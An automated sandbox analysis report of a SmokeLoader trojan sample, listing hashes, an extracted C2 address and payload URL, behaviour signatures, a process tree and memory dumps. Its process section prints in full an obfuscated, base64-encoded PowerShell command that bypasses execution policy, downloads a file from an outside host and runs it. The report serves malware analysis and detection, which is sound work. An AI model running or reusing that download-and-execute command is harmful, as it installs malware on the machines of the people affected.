Analysis
- max time kernel: 101s
- max time network: 104s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 13-04-2021 13:00
Static task: static1
Behavioral task: behavioral1
  Sample: 9fbd32c6bb25f6a660696fa9830c5040.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 9fbd32c6bb25f6a660696fa9830c5040.exe
  Resource: win10v20210410
General
- Target: 9fbd32c6bb25f6a660696fa9830c5040.exe
- Size: 847KB
- MD5: 9fbd32c6bb25f6a660696fa9830c5040
- SHA1: 1e41347d36792e823a8982b10170d83a0722e3cc
- SHA256: 5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
- SHA512: 3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
Malware Config
Extracted
- URL: https://u.teknik.io/28oLW.jpg
Extracted
- Family: smokeloader
- Version: 2018
- C2: http://94.140.115.43/1/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Blocklisted process makes network request (1 IoC)
  Processes (flow / pid / process):
    7 / 1780 / powershell.exe
- Executes dropped EXE (1 IoC)
  Processes (pid / process):
    1388 / eVDwACBtpW.exe
- Loads dropped DLL (2 IoCs)
  Processes (pid / process):
    1780 / powershell.exe (2 identical entries)
- Maps connected drives based on registry (3 TTPs, 2 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
    Key opened / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum / eVDwACBtpW.exe
    Key value queried / \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 / eVDwACBtpW.exe
- Drops file in System32 directory (2 IoCs)
  Processes (description / ioc / process):
    File opened for modification / C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk / powershell.exe (2 identical entries)
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid / process):
    1168 / powershell.exe (2 identical entries)
    1780 / powershell.exe (2 identical entries)
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes (pid / process):
    1388 / eVDwACBtpW.exe (2 identical entries)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description / pid / process):
    Token: SeDebugPrivilege / 1168 / powershell.exe
    Token: SeDebugPrivilege / 1780 / powershell.exe
- Suspicious use of FindShellTrayWindow (17 IoCs)
  Processes (pid / process):
    1688 / 9fbd32c6bb25f6a660696fa9830c5040.exe (17 identical entries)
- Suspicious use of SendNotifyMessage (17 IoCs)
  Processes (pid / process):
    1688 / 9fbd32c6bb25f6a660696fa9830c5040.exe (17 identical entries)
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes (description / pid / process / target process):
    PID 1688 wrote to memory of 1168 / 1688 / 9fbd32c6bb25f6a660696fa9830c5040.exe / powershell.exe (4 identical entries)
    PID 1168 wrote to memory of 1780 / 1168 / powershell.exe / powershell.exe (4 identical entries)
    PID 1780 wrote to memory of 1388 / 1780 / powershell.exe / eVDwACBtpW.exe (4 identical entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  Child process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Child process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      Child process: C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"
        - Executes dropped EXE
        - Maps connected drives based on registry
        - Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
  MD5: 0d1334075336455a13a36fd909417556
  SHA1: 4f1937f0eeeb697ef992547701295134fde65c20
  SHA256: 33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
  SHA512: d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: e76866e9ef9f26f77871223559246bfe
  SHA1: b8703ee6f7c21bcdc50abb5325c519c4f125b087
  SHA256: 9fffadcdc8c187ba4b43fa16221fe92d7a1912be824606a246696515b5084e92
  SHA512: 6ea0c90503eaf9c0d0a8a895efd7413cc02a5c7d8941e4a0de82b4e7809e5fc6c00c7f787850b54219d16335b98ee2ff023d6349cfae7e6166e0a231a946a03b
- \Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
  MD5: 0d1334075336455a13a36fd909417556
  SHA1: 4f1937f0eeeb697ef992547701295134fde65c20
  SHA256: 33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
  SHA512: d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
Memory dumps (file / size):
- memory/1168-66-0x0000000004660000-0x0000000004661000-memory.dmp / 4KB
- memory/1168-63-0x0000000004900000-0x0000000004901000-memory.dmp / 4KB
- memory/1168-67-0x0000000004890000-0x0000000004891000-memory.dmp / 4KB
- memory/1168-64-0x00000000048C0000-0x00000000048C1000-memory.dmp / 4KB
- memory/1168-60-0x0000000000000000-mapping.dmp
- memory/1168-65-0x00000000048C2000-0x00000000048C3000-memory.dmp / 4KB
- memory/1168-62-0x0000000000CD0000-0x0000000000CD1000-memory.dmp / 4KB
- memory/1208-101-0x0000000002C20000-0x0000000002C35000-memory.dmp / 84KB
- memory/1208-100-0x0000000002AA0000-0x0000000002AA1000-memory.dmp / 4KB
- memory/1388-97-0x0000000000000000-mapping.dmp
- memory/1688-59-0x0000000075011000-0x0000000075013000-memory.dmp / 8KB
- memory/1780-84-0x0000000006120000-0x0000000006121000-memory.dmp / 4KB
- memory/1780-93-0x0000000006380000-0x0000000006381000-memory.dmp / 4KB
- memory/1780-94-0x000000007EF30000-0x000000007EF31000-memory.dmp / 4KB
- memory/1780-92-0x0000000006360000-0x0000000006361000-memory.dmp / 4KB
- memory/1780-85-0x0000000006170000-0x0000000006171000-memory.dmp / 4KB
- memory/1780-79-0x00000000056F0000-0x00000000056F1000-memory.dmp / 4KB
- memory/1780-74-0x0000000002610000-0x000000000325A000-memory.dmp / 12.3MB
- memory/1780-73-0x0000000002610000-0x000000000325A000-memory.dmp / 12.3MB
- memory/1780-68-0x0000000000000000-mapping.dmp